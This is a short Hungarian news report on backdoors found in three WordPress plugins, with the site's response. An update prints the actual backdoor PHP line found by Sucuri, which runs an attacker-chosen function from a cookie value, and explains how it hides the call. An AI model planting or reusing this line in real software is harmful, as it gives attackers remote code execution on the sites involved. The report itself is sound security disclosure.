A WordPress figyelmeztetést adott ki, mely szerint három népszerű pluginban is jól elrejtett hátsó kaput fedeztek fel. Az érintett kiegészítők az AddThis, a WPTouch és a W3 Total Cache, a hátsóajtók jellegéről nincs információ. A blogszolgáltató még vizsgálja, hogy esetleg más pluginekhez is hozzáfértek-e a támadók - azt biztosra veszik, hogy a rosszindulatú módosítások külső féltől származnak, de nem tudják, hogyan sikerült illetéktelenül hozzáférést szerezni a tárolókhoz. 

A három kiegészítő kódját a legutóbbi ismert legitim állapotba állították vissza, és az összes WordPress.org, bbPress.org és BuddyPress.org felhasználónál kényszerítik a jelszóváltoztatást. Egyúttal figyelmeztetnek, hogy aki az utóbbi napokban plugint telepített vagy frissített, az jól teszi, ha nagyobb figyelmet szentel a rendszere biztonságának.

Friss:

A Securi csapata megvizsgálta az érintett pluginokat, és a következő backdoort találták:

if (preg_match("#useragent/([^/]*)/([^/]*)/#i", $_COOKIE[$key], $matches) && $matches[1]($matches[2]))  

                $this->desired_view = $matches[1].$matches[2]; 

Tehát a plugin ellenőrzi egy süti meglétét, egyezés esetén pedig a sütiben tárolt értékeknek megfelelően hajt végre egy függvényt. A trükk az, hogy a függvény neve (és a paraméter) is egy reguláris kifejezés illeszkedéseit tartalmazó változóban jelenik meg, valamint a futtatás és az ellenőrzés is egy if feltételben történik (a törzs már lényegtelen).